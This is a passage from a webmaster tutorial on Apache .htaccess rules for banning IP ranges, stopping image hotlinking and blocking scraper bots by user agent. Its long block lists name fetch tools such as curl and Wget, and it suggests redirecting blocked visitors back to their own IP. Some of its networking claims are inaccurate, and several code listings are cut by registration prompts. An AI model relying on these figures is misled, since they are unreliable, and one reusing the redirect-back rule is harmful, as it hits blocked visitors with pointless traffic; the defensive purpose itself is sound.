that tells the server who can or can not access the contents of the folder/directory it protects. .htaccess can be very simple or extremely complex depending upon your system requirements. Although .htaccess can be used for a lot of different functions, we are primarily concerned about using it to monitor the traffic to our site that is relative to controlling our bandwidth consumption so if you are already using a .htaccess for other purposes, you should backup it up just in case. If you don't have an .htaccess file in place, you can easily create one in your favorite text editor. By the way, Windows hates .htaccess files, doesn't know what to do with them and doesn't like it when you try to save them to disk either. The filename .htaccess begins with a ‘.' (dot). Actually, .htaccess is the file extension so it really doesn't have a file name per se. So, it is not file.htaccess or somepagename.htaccess, it is simply named .htaccess. In the unix/linux world this file type is suppose to be a "hidden" file. As a result, this causes them to be hidden on many Operating Systems as well, including Windows. You may have trouble finding or working with such hidden files on your local system. For example on some Windows systems you may have to go to the command prompt (DOS mode) to find the file. However, most standard text editors should have no problem with editing it. To work with it on the Windows box, create the file a temporary name, badguy.htaccess so you can work with it on your local computer. Then, when you transfer it to your remote server, you just need to rename it. Make sure you use a text editor and not a word processing program like Word because it will add hidden character that may product unpredictable results on your server. Although this document is not intended to be a comprehensive guide to file access or server security, it will give some basic examples of how to protect your code from being hijacked and your resources from being squandered by bad guys and stupid people who don't know any better. For a complete tutorial on this topic, search the web, several good one are available. You can also find web based tools that will help you generate .htaccess files automatically but be advised that you really should have a good command of the basics before jumping into automated tools. Automated tools can be a form of mindless "copy and paste" that can do more harm than good if you don't know what your script is doing or if suddenly everything stops working because of a problem with the .htaccess code. You should be able to look at it, understand what it is doing and, worst case, be able troubleshoot it if necessary. Okay, so we will be using a few different features of .htaccess during the following section to show you how you can protect your system and keep the bandwidth thieves at bay. The first one is simple. We can use a couple of different ways to ban an IP address but here is the basic one. If you had nothing else in your .htaccess file, it would look like this: Actually, the first example we presented of a log file record is a bad guy from Turkey who has been trying to gain access and exploit our system. If that was really his IP address (which is unlikely given he appears to be using a robot to submit his requests), the above statement would prevent him from accessing our system by IP address. In the real world, if he tried to run that same query with this .htaccess file in place, he would get a 403 Access Forbidden error screen and nothing else. If you noticed that the bad guy was pounding your system with a group of IP address and they are all in the same IP range, you could ban the whole range with the same command, slightly modified. Assuming that all of the IP addresses came from 81.215.94.xx, you would simply change the ban to:order allow,deny Notice that we only removed the digits in the last sequence of numbers. You must preserve the dot so that .htacess know you mean to ban the whole range from 0 - 255.order allow,deny Side Note: As you may know the IP address is a 32-bit binary address. This 32-bit address is subdivided into four 8-bit segments called octets. The IP address is almost always expressed in what is called dotted decimal format, for example, 192.168.1.100 and in our log files we should always see the whole number displayed. For the purposes of banning IP addresses, you should know that part of the IP address is used for the network ID, and part of the address is used for the host ID. A simplified example is as follows: In an IP4 model (the established standard IP structure), if you look at the IP address on a Class B network, from left to right, the two octets on left would be network addresses and the two octets on the right would be host addresses on that network. You should mostly be concerned with banning the host ID section which is where the bad guy's playground is. Depending on what class network he is on, you would want to block only the host section of the IP address. Rarely, if ever, for example would you need to block everything but the first octet. Generally, getting the whole range of hosts in the fourth octet would suffice, though we have noticed that this Turkish bad guy has used a number of different hosts from the last two octets which means he is on a class B network probably. Most IP addresses fall into the following address classes: Class A addresses— The first 8 bits of the IP address are used for the network ID. The final 24 bits are used for the host ID. Class B addresses— The first 16 bits of the IP address are used for the network ID. The final 16 bits are used for the host ID. Class C addresses— The first 24 bits of the IP address are used for the network ID. The final 8 bits are used for the host ID. With this information, you should have enough background to be able to intelligently use IP banning without getting you into a whole lot of trouble. Remember, if you ban by ranges, you cut out potentially legitimate visitors to your site, so you need to use this technique prudently and judiciously to make sure you don't chop your own head off! Be aware that you would rarely if every have to ban an IP address range beyond two octets. For example, if you were to ban all of the IP addresses in the Class C network, you would be losing more than 500 million potential visitors to your site so be cautious about what you ban when working with ranges. You can ban specific groups within an IP range as well but that is outside the scope of this document and you are encouraged to study the Apache Documentation on .htaccess to find out how and what you can do relative to that topic. So how did we know this bad guy was from Turkey? Good question! You can find some great tools on the internet that will allow you to do an IP look up and find out where a specific IP address belongs, at least what network and what host they are using. Given the nature of the internet, finding the computer that is using a particular IP address is not that simple but you an certainly find what host they are using, if, of course, they are not using a fake IP address, that is. Unless they are really bad guys, more often than not, you will be able to track the IP address to the correct host, however. Generally, the bandwidth thieves are pretty stupid and not to clever so they are easy to track. For example, Code:
Content visible to registered members only. Please Click Here To Register Code:
Content visible to registered members only. Please Click Here To Register By the way, in case you don't know or are wonder about what a "whois" record is, it provides information about who registers a website domain name and where the website is being hosted as well as contact information for administrative and technical support. Looking up a site's whois record (you can use either IP address or domain name for the lookup), can help figure out where a specific site or an IP address is located and whether or not they are legitimate. Often, just knowing "where" an IP address or site is located can tell you much about how you should manage your investigation of a badguy, for example. Okay, so what about those greedy, hijacking, hotlinkers? No problem! First we need to find out if he have a hotlinker hijacking our great content, though you really don't have to find one in your logs if you assume correctly that all hotlinkers come in as referrers to your site. In the code below, your domain is assumed to be Code:
Content visible to registered members only. Please Click Here To Register Generally, hotlinkers do the most damage to your bandwidth by linking to images and media that is on your site. So, we want to write our restriction to include any and all types of media that might be a target and prevent it from being accessed by questionable requestors BUT we do want the same media to be available to visitors who are legitimately using our site. Another consideration we need to make is "empty" referrers. If someone calls the URL directly, the referrer field will not be populated so we need to check for empty referrer fields as well. Okay, so now that we have the above criteria we can develop our action plan to prevent unauthorized access of your media files. The relatively simple technique we propose is that you deploy the following set of instructions using mod_rewrite. RewriteEngine On RewriteCond %{HTTP_REFERER} !^ Code:
Content visible to registered members only. Please Click Here To Register RewriteCond %{HTTP_REFERER} ^http:// [NC] RewriteCond %{HTTP_REFERER} !^$ RewriteRule \.(jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$ - [F] OMG! What the heck is that? Only looks complicated, this particular chunk of code is what will prevent the bandwidth thieves from wreaking havoc on your bank account! Hold on here, this looks more complicated than it is. As we mentioned, we need mod_rewrite to be enable. In the listing we are doing some pretty simple stuff. First we make sure that the RewriteEngine is turned on, we then set the conditions we want to test for, then we set rules that we want to apply to the conditions and finally we state what the outcome needs to be if the conditions are met. This example listing will return a big "Forbidden Access" page to answer any request made for any of the media files on your site (as you can see in the RewriteRule at the end of the listing, it covers most media extensions available, if you have media types not listed, you can easily add them to this rule). The first line obviously turns on the RewriteEngine followed by a condition to exclude your site from the rule. The next condition pretty much covers any URL that refers their visitor to your content. Basically, it says if the referrer starts with http:// then it matches the RewriteCond. The next line considers requests that have referrer without the http:// or the referrer field is not empty. This condition rejects all those requests as well. The RewriteRule in this case will return a 403 Forbidden error instead of the requested image. Notice the condition statements, the first half of the statements are all the same, they all set the condition on the http_referer. The second part of the statement sets the terms of the condition, for example - "!^ Code:
Content visible to registered members only. Please Click Here To Register A quick reference note (you can find the definitions here for all of the regular expressions - special characters used in this section of the document): . (dot) matches any single character, except the ending of a line.If you should be so inclined, you can even redirect your bandwidth thief to any site you deem worthy of their attention with appropriate content to "wake them up" perhaps, for example here is the code, you would simply modify the URL to point to a suitable site. RewriteRule .*\.( jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$ Code:
Content visible to registered members only. Please Click Here To Register Of course, if you wanted to be creative, you could redirect them to your own image or media file to encourage the visitor to access your site directly and short circuit the hotlinker's plan. The possibilities are only limited by your imagination. RewriteRule .*\.( jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$ Code:
Content visible to registered members only. Please Click Here To Register So, what if you don't have the ability to use mod_rewrite? What then? Thought you'd never ask! Here is an alternative method of achieving the similar or the same results using the SetEnvIfNoCase Referer technique: If you don't have mod_rewrite enabled, not to worry, you can use the following technique instead with pretty much the same end results: SetEnvIfNoCase Referer "^http://www.yourdomain.com/" allowed=1 SetEnvIfNoCase Referer "^http://yourdomain.com/" allowed=1 SetEnvIfNoCase Referer "^$" allowed=1 <FilesMatch "\.( jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$"> Order Allow,Deny Allow from env=allowed </FilesMatch> Basically, this method allows for everyone on your site, either with or without the www prefix and empty referrer fields as well to access the media on your site. Everyone else is excluded by default. This set of instruction specifically identifies the acceptable users of your site rather than trying to exclude just the bad guys, though you could easily do that too if you have the URLs for them. For example, you can explicitly control who accesses your media using the following model (change the domain to fit your circumstances, of course): SetEnvIfNoCase Referer "^http://www.yourdomain.com/" goodguys=1 SetEnvIfNoCase Referer "^http://www.yourdomain.com$" goodguys=1 SetEnvIfNoCase Referer "^http://yourdomain.com/" goodguys=1 SetEnvIfNoCase Referer "^http://yourdomain.com$" goodguys=1 SetEnvIfNoCase Referer "^http://www.bandwidthbandit.com$" badguys=1 SetEnvIfNoCase Referer "^http://bandwidthbandit.com/" badguys=1 SetEnvIfNoCase Referer "^$" goodguys=1 <FilesMatch "\.( jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$"> Order Allow,Deny Allow from env=goodguys Deny from env=badguys </FilesMatch> As you can see, you have many options on controlling who can access your site and what they can access but you should be aware that this is not a "one shot" exercise. It requires at least a modest amount of attention to remain effective, though you certainly don't need to be manic about monitoring your links and media but you do need to be somewhat vigilant to insure that you are getting the most bang out of your bandwidth buck! Okay, so bring on the bots! We covered the botnet/badbots behavior and issues pretty extensively in the introduction, so now we need to figure out what to do about them. This section will simply focus on how you can prevent bots from eating up your bandwidth. Generally, your defense against unwanted bots activity is in filtering for the HTTP_USER_AGENT which is where they normally place their identity information. By the end of this section, you will be able to effectively write access control blocks to prevent the bad bots from accessing your system and therefore gain better control of your bandwidth consumption. A really good reference can be found by doing a search for "A Close to perfect .htaccess ban list" in your favorite search engine. It should point you to a group of forums and threads on the webmasterworld.com site. Most of the contents of the following list came from references found in the contents on the threads mentioned. Despite the fact that the information is "old", surprisingly it is not stale and new data concerning these bots is not very forthcoming. However, you will find the listing there are still useful which says something about the robots and their authors. SideNote: The same may not be said for the recent proliferation of botnet gangs who use badbots to shotgun pay-per-click sites. They are constantly adapting and changing to their environmental conditions (to avoid detection and/or capture - capture rate for these badboys is in the single digit percent zone relative to the number of "known" botnets) and requirements (work orders for their services - the PPC assignments to target) to exploit the largest number of ppc clients they can with greatest number of zombies they can recruit. Additionally, some of these zombie networks are being used to fraudulently scan desktop and back-end systems. They scan infected systems (and any other system they can access for that matter) to obtain credit card numbers, bank accounts and personal information including log-ins and passwords. The operators can and do potentially launch these scans from any computer on the botnet to mask their actual location. The badbot gangs (supposedly about 200 world wide that control hundreds of thousands of computers, mostly exposed and infected home PCs) primarily focus on PPC clients, SPAM distribution, Email Harvesting and Phishing for Financial Information. Generally run by organized crime and terrorist operations, they rarely if ever get caught and they wreak havoc everywhere they go with their worms, viruses, robots and zombie network. Part of their success is their ability to disappear and reappear in an instant, like a chameleon. All of their operations are "portable" and can be completely dismantled and reassembled in a matter of hours, typically. The problem with trapping botnet zombies is that they are all basically home computer that have been hijacked so the HTTP_USER_AGENT and the requests just "look" like a regular user/visitor to your site. Perhaps one clue would be traffic to the forms on your site. In our situation, we see a fair amount of "multiple" hits to our contact and addalink forms from the same IP addresses. Of course all of our forms are equipped with captcha security images so the bots can not complete the form requirements and they go away. In these cases we add the IP address to our Deny listings. We keep that section of our .htaccess file in numeric order so we can see if we have a banned IP address already entered and we either add the new address to the list or modify the existing range to accommodate the new address. Note: Securing your computer to avoid botnets is beyond the scope of this tutorial but you can find many useful ideas and suggestions by doing a query for "botnets + security" on your favorite search engine. Back on topic, most of the badbots in the listings presented here are ones that have been around for a while and are still very much active today. Trapping the bot is a little different than banning a hotlinker because you have to trap a value that might be "included" in a title instead of whole URL that you know. For example, let's look at the first example in our listing. This condition states that we need to look for an HTTP_USER_AGENT that "contains" an agent that begins with BlackWidow. The server checks the incoming request to see if the HTTP_USER_AGENT begins with BlackWidow. If it does not, it drops to the next test and so on until it reaches the bottom of the list. In the event that the server does find the condition to be true, it goes to the rule and takes the appropriate action. Notice the [OR] statement the end of each line in the list. By the way, you can increase the efficiency of the conditional statements if you provide both the "begin" and the "end" of each agent statement you want to block because the server only has to look for the whole condition. Take for example, the line that contains HTTrack. This conditional tells the server, "Look for this parameter contained anywhere within the HTTP_USER_AGENT record. This means the server has to do a search to find HTTrack if it exists, not very efficient. On the other hand if you knew were it was in the record, you could write the conditional statement more efficiently. Notice also that spaces need to be "escaped" using "\" the backward slash in the conditional statement. RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR] RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR] RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR] RewriteCond %{HTTP_USER_AGENT} ^Custo [OR] RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR] RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR] RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR] RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR] RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR] RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR] RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR] RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR] RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR] RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR] RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR] RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR] RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR] RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR] RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR] RewriteCond %{HTTP_USER_AGENT} ^HMView [OR] RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR] RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR] RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR] RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR] RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR] RewriteCond %{HTTP_USER_AGENT} ^larbin [OR] RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR] RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR] RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR] RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR] RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR] RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR] RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR] RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR] RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR] RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR] RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR] RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR] RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR] RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR] RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR] RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR] RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR] RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR] RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR] RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR] RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR] RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR] RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR] RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR] RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR] RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR] RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR] RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR] RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR] RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR] RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR] RewriteCond %{HTTP_USER_AGENT} ^Wget [OR] RewriteCond %{HTTP_USER_AGENT} ^Widow [OR] RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR] RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR] RewriteCond %{HTTP_USER_AGENT} ^Zeus RewriteRule ^.* - [F,L] Bots listed above will all receive a 403 Forbidden error when trying to access your site. The amount of bandwidth savings and decrease in server resource consumption as a result of the deployment of this script may vary depending, of course, on your site traffic and how big the hijacking problem is on your site. However, the overall savings may be significant in many cases. Certainly, the conservation of bandwidth should far outweigh the resources required to run this script and it provides you with a measurable control on both the inbound and outbound traffic on your site. If you experience performance problems using these tools, you may have to optimize them to the requirements of your site. You probably need to do some benchmarking to identify whether or not you have a problem. Having said that, some sites that have monster .htaccess files have reported acceptable performance in benchmark testing of their sites relative to the degradations they were seeing before they started shutting down the malicious bad boy's activities. Here is an example of a similar list but managed a little differently and slightly more complex. Basically, it is arranged alphabetically and uses multiple "OR" operators to accommodate multiple bots in a single statement: <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_USER_AGENT} ^(.*almaden\.ibm.*$|.*BackDoorBot.*$|.*BlowFish.*$ |.*Bullseye.*$|.*CherryPicker.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*DISCo.*$|.*DTS\.Agent.*$|.*Enterprise_Search.* $|.*Extractor.*$|.*findlinks.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*fluffy.*$|.*GetRight.*$|.*GeoBot.*$|.*Girafabo t.*$|.*Harvest.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*httplib.*$|.*HTTrack.*$|.*Harvest.*$|.*ia_arch iver.*$|.*Jetbot.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*Keyword\ Density.*$|.*libWeb/.*$|.*libwww-perl.*$|.*lwp-trivial.*$|.*LinkScan.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*Linkextractor.*$|.*LWP.*$|.*MIIxpc.*$|.*moget. *$|.*Mo\ College.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*Openfind.*$|.*OrangeSpider.*$|.*picsearch.*$|. *prospector.*$|.*ProPowerBot.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*RepoMonkey.*$|.*Rover.*$|.*SuperBot.*$|.*Syntr yx\ ANT\ Scout.*$|.*RepoMonkey.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*searchhippo.*$|.*Szukacz.*$|.*T8Abot.*$|.*Tele port.*$|.*TrueRobot.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*True_Robot.*$|.*URL\ Control.*$|.*VCI\ WebViewer.*$|.*webcraft.*$|.*WebZip.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*WebBandit.*$|.*WWWeasel.*$|.*Wge.*$|.*Wells\ Search.*$|.*WebmasterWorld\.com\ bot.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(.*WebZip.*$|.*WEP\ Search.*$|.*WUMPUS.*$|.*Xenu's.*$|.*Zeus.*$) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(ah-ha|aktuelles|amzn_assoc|asterias|attache) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(autohttp|ADSARobot|Alexibot|ASPSeek|ASSORT) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(ATHENS|b2w/0\.1|bew|big\.brother|bumblebee) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(BecomeBot|Black\ Hole|BlackWidow|Bot\ mailto:craftbot@yahoo\.com|BotALot) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Browses|BuiltBotTough|Bullseye|BunnySlippers|cos mos) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(curl|CheeseBot|CherryPicker|ChinaClaw|CopyRightC heck) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Crescent|digout4uagent|disco|dumbot|Digger) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(DigOut4U|Deweb|Digimarc|DittoSpyder|DIIbot) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Download\ Demon|ecollector|eCatch|EirGrabber|EmailCollector) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(EmailSiphon|EmailWolf|EO\ Browse|Eval|Express\ WebPictures) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(ExtractorPro|EyeNetIE|fastlwspider|FairAd\ Client|FAST) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(FEZhead|FavOrg|Favorites\.Sweeper|Fetch|FlashGet ) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Foobot|FreeFind|Generic|Getleft|GetURL) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(GetWebPage|Go!Zilla|Go-Ahead-Got-It|Googlebot-Image|GrabNet) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Grafula|Hatena\ Antenna|hloader|humanlinks|HMView) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(HomePageSearch|iSiloWeb|IBM_Planetwide|Image\ Stripper|Image\ Sucker) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(IncyWincy|InfoNaviRobot|Ingelin|InterGET|Interne t\ Explore\ 5\.x) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Internet\ Ninja|JennyBot|JoBo|JOC\ Web\ Spider|Kenjin\ Spider) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(KWebGet|larbin|leech|libwww-perl|LeechFTP) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(LexiBot|LinkWalker|LNSpiderguy|Mata\ Hari|MCspider) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Microsoft\.URL|MIDown\ tool|MSFrontPage|MS\ FrontPage|MSProxy) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Mass\ Downloader|MSIECrawler|Mirror|Mister\ PiX|naver) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(netattache|netprospector|nicerspro|nost\.info|NP Bot) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Navroad|NearSite|Net\.Vampire|NetAnts|NetAttache ) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(NetCarta|NetMechanic|NetResearchServer|NetSpider |NetZIP) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Net\ Vampire|NexTools\ WebAgent|NICErsPRO|Octopus|Offline\ Explorer) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Offline\ Navigator|OmniExplorer_Bot|OpaL|OpenTextSiteCrawle r|Openfind) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(OrangeBot|pavuk|pcBrowser|psbot|Port\ Huron\ Labs) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(PSurf|PackRat|PageGrabber|PageDown|Papa\ Foto) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(ParaSite|Plucker|ProWebWalker|PushSite|Python-urllib) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(reget|ReGet|RealDownload|RepoMonkey|Robozilla) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Rover|Rsync|RMA|searchterms\.it|sitecheck) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Searchworks\ Spider|ScoutAbout|Shai|Siphon|SiteSnagger) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(SiteMapper|SmartDownload|Spegla|SpankBot|spanner ) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(SpiderBot|SqWorm|Stanford\ Comp\ Sci|SuperBot|SuperHTTP) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Surf|Surfbot|SurfWalker|tAkeOut|tarspider) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(toCrawl/UrlDispatcher|turingos|TheNomad|Telesoft|Templeton ) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(The\ Intraformant|Titan|UIowaCrawler|UtilMind|URL2File) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(URL_Spider_Pro|URLy\ Warning|vspider|VoidEYE|VCI) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(Web2Map|web\.by\.mail|w3mir|Webdup|webvac) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(webwalk|wbdbot|web\.by\.mail|Webrobot|webvac) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(webwalk|Widow|WWW-Collector-E|www\.pl|WebBandit) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(WebEMailExtrac|WEBMASTERS|WISEbot|WebAuto|WebCop ier) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(WebCopy|WebEnhancer|WebFetch|WebmasterWorldForum Bot|WebMiner) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(WebReaper|WebSauger|Website\ Quester|WebSnake|WebStripper) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(WebVac|WebWhacker|Web\ Image\ Collector|Web\ Sucker|WebStripper) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(WebTwin|WebVCR|Website\ eXtractor|WebSnake|WebStripper) [NC,OR] RewriteCond %{HTTP_USER_AGENT} ^(WhosTalking|WUMPUS|WWWOFFLE|XGET|Xaldon\ WebSpider) RewriteRule ^.* - [F,L] </ifModule> So how do we know if all this stuff is working or not? Whenever anyone sends a request to your site and it fails for any reason, the failure gets logged in the Apache Error Log. The entry is similar to the access log but it lists usually just contains different information. Actually, the error log is easier to read. Your error log will have entries similar to the following if the blocks you have written are working correctly. In this case the script is returning a custom 403 page to the bad guy so we show both entries for you review (they have been sanitized for public consumption but they did come from a real log file). If you don't have a custom page, it generates a generic page and you get a 404 file not found on the 403 message line instead. [Mon Dec 18 15:34:34 2006] [error] [client 65.162.187.20] client denied by server configuration: /home/username/public_html [Mon Dec 18 15:34:34 2006] [error] [client 65.162.187.20] client denied by server configuration: /home/username/public_html/403.shtml The example presented is in reference to one of the "deny from" IP statements. The bad bots ban error message would be similar. Another way to figure out if your blocks are working is to modify the rule by adding a redirect back to the referer via the remote_addr. For example: RewriteRule ^(.*) http://%{REMOTE_ADDR}/ [R=301,L] This rule is suppose to return an access denied screen to the IP address which will actually just "time out" but you can see the attempt to access the IP address on the status bar when it tries to make the attempt. If you see the attempted access that means your script blocked the attempt. Otherwise, you will see your normal screen. This is particularly useful if you are blocking a spammer because their script won't work and they won't see the redirect back to them usually but they won't like it because the whole operation will take too long with the time out and all. Summary In the long run, bandwidth conservation is a matter of diligence. If you keep on top of it, you can prevent most of the bad guys form exploiting your and your site. Now that you have a basic understanding of all issues you have to manage you will be able to control much of the Bandwidth Theft that occurs on your site. With the new level of confidence and the tools provided, you are now able to manually analyze your log files to see how your bandwidth is being used and, if abused, you can see where your resources are going and who is using them. Create and customize .htaccess files, using mod_rewrite and SetEnvIfNoCase, you are effectively able write procedures to block bad guys from sucking up your bandwidth resources. You are able to explain the most common ways that your bandwidth can be abused and also develop and deploy multiple solutions to each, including site downloaders, email harvesters, bad robots and media/content thieves. You are now able to find hotlinkers in your log files, deploy effective procedures to block their access to your system and redirect them to some other appropriate resource of your choosing. You are now able to make intelligent choices about the methods you want to deploy to curtail any abuse of your bandwidth and/or website. Finally, you are able to provide proactive solutions to add a measure of security to your site to prevent bandwidth theft. Conclusion. We have tried to present a balanced overview of bandwidth theft and some ideas (some controversial for sure) on how you can solve some of the problems with it. In the end, each owner/operator has to deploy the solution that works for their business. IP banning, Blacklists and Privacy are all sensitive and controversial issues. Although the final decisions are a matter of personal preference, ultimately, they need to promote the continued success of the business and stimulate a healthy ROI if possible. Therefore deployment decisions need to reflect the best interest of the business first and foremost. In the end, you are ultimately responsible for your business and its success or failure. So, you need to work out for yourself how much time you can commit to bandwidth theft on your site. For sure, bandwidth conservation is a balance between prevention and abuse. If you are not overwhelmed by massive attacks on your system, perhaps the best way to combat the problem is to be diligent and have regular updates to your .htaccess file to make sure you include any new threats you discover on a regular basis. You probably need to do some benchmarks to determine what "regular updates" means for your particular situation. If, on the other hand, you are swamped with a number of the issues we have listed maybe you need to seek some alternatives to help you out with the task. The worst thing you can do is nothing if you have a problem. Guaranteed, the problem will not solve itself and only get worse if it is not address in some matter. You probably would dream of letting your email box fill up with spam without making some effort to filter out the garbage. You bandwidth bandits are no different. You need to develop and effective and hopefully proactive plan to short circuit or curtail unauthorized access to your site. We hope this tutorial has provided some useful information and instruction to enable your efforts to be successful. Certainly if you need help or further advice on resolving some problems, feel free to contact us. We are always willing to help. What's next? Now that you are able to correctly interpret your log file contents, you might want to move to any of a number of commercial and open-source tools that you can use to process and display your log data. They usually take a log file, analyze its 